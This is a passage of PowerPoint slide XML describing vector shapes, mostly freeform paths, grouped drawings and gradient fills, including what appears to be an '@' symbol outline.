                        <a:gd name="T91" fmla="*/ 81 h 119"/>
                        <a:gd name="T92" fmla="*/ 46 w 109"/>
                        <a:gd name="T93" fmla="*/ 85 h 119"/>
                        <a:gd name="T94" fmla="*/ 54 w 109"/>
                        <a:gd name="T95" fmla="*/ 81 h 119"/>
                        <a:gd name="T96" fmla="*/ 60 w 109"/>
                        <a:gd name="T97" fmla="*/ 66 h 119"/>
                        <a:gd name="T98" fmla="*/ 63 w 109"/>
                        <a:gd name="T99" fmla="*/ 46 h 119"/>
                        <a:gd name="T100" fmla="*/ 60 w 109"/>
                        <a:gd name="T101" fmla="*/ 36 h 119"/>
                        <a:gd name="T102" fmla="*/ 53 w 109"/>
                        <a:gd name="T103" fmla="*/ 32 h 119"/>
                        <a:gd name="T104" fmla="*/ 45 w 109"/>
                        <a:gd name="T105" fmla="*/ 36 h 119"/>
                        <a:gd name="T106" fmla="*/ 38 w 109"/>
                        <a:gd name="T107" fmla="*/ 50 h 119"/>
                        <a:gd name="T108" fmla="*/ 35 w 109"/>
                        <a:gd name="T109" fmla="*/ 69 h 11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  <a:cxn ang="0">
                          <a:pos x="T86" y="T87"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T88" y="T89"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T90" y="T91"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T92" y="T93"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T94" y="T95"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T96" y="T97"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T98" y="T99"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T100" y="T101"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T102" y="T103"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T104" y="T105"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T106" y="T107"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T108" y="T109"/>
                        </a:cxn>
                      </a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="109" h="119">
                          <a:moveTo>
                            <a:pt x="83" y="23"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="74" y="78"/>
                            <a:pt x="74" y="78"/>
                            <a:pt x="74" y="78"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="73" y="79"/>
                            <a:pt x="73" y="80"/>
                            <a:pt x="73" y="80"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="73" y="81"/>
                            <a:pt x="73" y="82"/>
                            <a:pt x="74" y="82"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="75" y="83"/>
                            <a:pt x="75" y="83"/>
                            <a:pt x="76" y="83"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="78" y="83"/>
                            <a:pt x="81" y="82"/>
                            <a:pt x="84" y="80"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="88" y="77"/>
                            <a:pt x="91" y="73"/>
                            <a:pt x="94" y="68"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="96" y="63"/>
                            <a:pt x="98" y="57"/>
                            <a:pt x="98" y="49"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="98" y="37"/>
                            <a:pt x="94" y="28"/>
                            <a:pt x="87" y="20"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="80" y="13"/>
                            <a:pt x="70" y="10"/>
                            <a:pt x="58" y="10"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="49" y="10"/>
                            <a:pt x="41" y="12"/>
                            <a:pt x="33" y="16"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="26" y="20"/>
                            <a:pt x="20" y="26"/>
                            <a:pt x="16" y="34"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="13" y="42"/>
                            <a:pt x="11" y="51"/>
                            <a:pt x="11" y="60"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="11" y="75"/>
                            <a:pt x="15" y="87"/>
                            <a:pt x="24" y="96"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="32" y="104"/>
                            <a:pt x="43" y="109"/>
                            <a:pt x="57" y="109"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="64" y="109"/>
                            <a:pt x="70" y="107"/>
                            <a:pt x="76" y="105"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="82" y="103"/>
                            <a:pt x="88" y="100"/>
                            <a:pt x="94" y="96"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="109" y="96"/>
                            <a:pt x="109" y="96"/>
                            <a:pt x="109" y="96"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="105" y="100"/>
                            <a:pt x="101" y="104"/>
                            <a:pt x="97" y="106"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="92" y="110"/>
                            <a:pt x="86" y="113"/>
                            <a:pt x="79" y="115"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="73" y="118"/>
                            <a:pt x="65" y="119"/>
                            <a:pt x="57" y="119"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="46" y="119"/>
                            <a:pt x="36" y="116"/>
                            <a:pt x="28" y="111"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="19" y="106"/>
                            <a:pt x="12" y="99"/>
                            <a:pt x="7" y="90"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="2" y="81"/>
                            <a:pt x="0" y="71"/>
                            <a:pt x="0" y="60"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="49"/>
                            <a:pt x="2" y="38"/>
                            <a:pt x="7" y="29"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="12" y="19"/>
                            <a:pt x="19" y="12"/>
                            <a:pt x="28" y="7"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="36" y="2"/>
                            <a:pt x="46" y="0"/>
                            <a:pt x="58" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="73" y="0"/>
                            <a:pt x="85" y="4"/>
                            <a:pt x="94" y="13"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="104" y="23"/>
                            <a:pt x="109" y="35"/>
                            <a:pt x="109" y="49"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="109" y="58"/>
                            <a:pt x="107" y="66"/>
                            <a:pt x="103" y="73"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="99" y="80"/>
                            <a:pt x="94" y="86"/>
                            <a:pt x="87" y="90"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="81" y="93"/>
                            <a:pt x="76" y="95"/>
                            <a:pt x="72" y="95"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="69" y="95"/>
                            <a:pt x="66" y="94"/>
                            <a:pt x="64" y="93"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="63" y="92"/>
                            <a:pt x="61" y="89"/>
                            <a:pt x="60" y="87"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="57" y="90"/>
                            <a:pt x="54" y="92"/>
                            <a:pt x="52" y="93"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="49" y="94"/>
                            <a:pt x="46" y="95"/>
                            <a:pt x="43" y="95"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="37" y="95"/>
                            <a:pt x="32" y="92"/>
                            <a:pt x="27" y="87"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="22" y="82"/>
                            <a:pt x="20" y="75"/>
                            <a:pt x="20" y="65"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="20" y="54"/>
                            <a:pt x="23" y="44"/>
                            <a:pt x="29" y="35"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="35" y="26"/>
                            <a:pt x="42" y="21"/>
                            <a:pt x="51" y="21"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="54" y="21"/>
                            <a:pt x="57" y="22"/>
                            <a:pt x="60" y="23"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="62" y="25"/>
                            <a:pt x="65" y="27"/>
                            <a:pt x="67" y="31"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="69" y="23"/>
                            <a:pt x="69" y="23"/>
                            <a:pt x="69" y="23"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="83" y="23"/>
                            <a:pt x="83" y="23"/>
                            <a:pt x="83" y="23"/>
                          </a:cubicBezTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="35" y="69"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="35" y="74"/>
                            <a:pt x="36" y="78"/>
                            <a:pt x="39" y="81"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="41" y="84"/>
                            <a:pt x="43" y="85"/>
                            <a:pt x="46" y="85"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="49" y="85"/>
                            <a:pt x="51" y="84"/>
                            <a:pt x="54" y="81"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="56" y="78"/>
                            <a:pt x="58" y="74"/>
                            <a:pt x="60" y="66"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="62" y="59"/>
                            <a:pt x="63" y="52"/>
                            <a:pt x="63" y="46"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="63" y="41"/>
                            <a:pt x="62" y="38"/>
                            <a:pt x="60" y="36"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="58" y="33"/>
                            <a:pt x="56" y="32"/>
                            <a:pt x="53" y="32"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="50" y="32"/>
                            <a:pt x="47" y="33"/>
                            <a:pt x="45" y="36"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="42" y="39"/>
                            <a:pt x="39" y="44"/>
                            <a:pt x="38" y="50"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="36" y="57"/>
                            <a:pt x="35" y="63"/>
                            <a:pt x="35" y="69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6350" cmpd="sng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2070" name="Group 2222">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E1B457-00DC-46CF-807D-95A2F0BD5E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67767" y="2382838"/>
              <a:ext cx="657225" cy="196850"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2608" name="Freeform 2223">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96AF169A-216F-483C-A156-BF2A69A93FA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58" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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09" name="Freeform 2224">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3125EDF3-1AE6-45B5-A17E-1DC7CB6C55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240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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10" name="Freeform 2225">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{986AB8EE-C342-4909-ABC8-E35F03D22C0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240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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11" name="Freeform 2226">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63EB78F7-C643-4A41-8E68-F1240702C18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48" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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12" name="Freeform 2227">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E224EED4-62D7-42D5-91F3-085B8FB12CB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104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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071" name="Group 2302">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8FEC530-5D02-4C25-8736-3C408C1D97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430" y="1223963"/>
              <a:ext cx="2044700" cy="1244600"/>
              <a:chOff x="3247" y="1897"/>
              <a:chExt cx="1288" cy="784"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2424" name="Freeform 1886">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{697727FD-C88A-4642-B554-9144347BC6F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7" y="2336"/>
                <a:ext cx="1288" cy="345"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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425" name="Group 1887">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8448BF5F-572B-4CC4-82ED-BE2AC029C6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51" y="1897"/>
                <a:ext cx="643" cy="609"/>
                <a:chOff x="1079" y="1709"/>
                <a:chExt cx="1300" cy="1250"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="2426" name="Group 1888">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CE63C38-3FEC-4643-B882-6A2F4FD7BA3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079" y="1709"/>
                  <a:ext cx="1300" cy="1250"/>
                  <a:chOff x="1079" y="1709"/>
                  <a:chExt cx="1300" cy="1250"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="2484" name="Group 1889">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D72AF05-CFED-4219-9900-4AB7A52913F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079" y="2385"/>
                    <a:ext cx="1300" cy="574"/>
                    <a:chOff x="1079" y="2385"/>
                    <a:chExt cx="1300" cy="574"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="2578" name="Group 1890">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{504440BD-148B-4271-9661-21FD6FCE2F6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946" y="2385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603" name="Freeform 1891">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{407B192F-2AA6-434A-B73D-1CBE8566CE4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604" name="Freeform 1892">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD5BB7E-A15E-468C-BD68-E2450F34B0B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605" name="Freeform 1893">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C08BF8F-3A8C-42D7-8CB3-7FDB505AE82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606" name="Freeform 1894">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEFA01C0-4366-484B-BE18-B225DB554438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607" name="Freeform 1895">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0215F03B-C25B-4134-972B-2638E3C1323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579" name="Group 1896">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{174055C4-3236-4F18-88A5-004F3A7A30D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728" y="2443"/>
                      <a:ext cx="434" cy="341"/>
                      <a:chOff x="585" y="1098"/>
                      <a:chExt cx="662" cy="521"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2598" name="Freeform 1897">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5B16271-6CDF-45A3-9BED-F2431FFCD0C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99" name="Freeform 1898">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D01A63B-1B24-4F56-B508-A33779A5CC2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600" name="Freeform 1899">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0F1968A-903F-457C-AED4-C7C30112422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601" name="Freeform 1900">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29B2B005-EC04-47B5-B073-F6555770F027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602" name="Freeform 1901">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{044B2005-FABE-496A-9D60-E9EBEBAAD87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580" name="Group 1902">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47FC32E-FDDE-4807-BB86-269C2AD37FD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512" y="2501"/>
                      <a:ext cx="433" cy="342"/>
                      <a:chOff x="585" y="1098"/>
                      <a:chExt cx="662" cy="521"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2593" name="Freeform 1903">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B246BEA-9A45-4A5F-8E20-772FD71EB42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94" name="Freeform 1904">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DEA9BF8-B930-49CF-9F5B-D1E77F05891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95" name="Freeform 1905">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B03B351-1F74-4472-9915-FCDC1979DBC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96" name="Freeform 1906">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C214BC4E-2F68-4FD6-8EB3-20DE6E8A94FD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97" name="Freeform 1907">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79D60A2E-FDFB-44AA-956E-3F746FD1440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581" name="Group 1908">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1918F1D-D0F6-4187-8F60-B0244828FBC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295" y="2560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588" name="Freeform 1909">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBEA9486-F270-4B5F-853C-F72B7BFB51A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89" name="Freeform 1910">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B4584BE-E19C-49F7-9C0F-B40805C0A8E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90" name="Freeform 1911">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46D48D47-BF10-4961-8E6B-2BF10878BD3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91" name="Freeform 1912">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23EC224F-980F-40FA-A94F-AC6F88E856C7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92" name="Freeform 1913">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1011992-1F8B-4CC3-B6BD-27F696CE62E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582" name="Group 1914">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8094BD96-BC20-45BA-B445-B9ECC0A4851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079" y="2618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583" name="Freeform 1915">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3657F897-73DC-4349-8003-FB499DD9A03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84" name="Freeform 1916">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF9602D5-527B-41D1-87AC-745B7CF1DEC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85" name="Freeform 1917">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
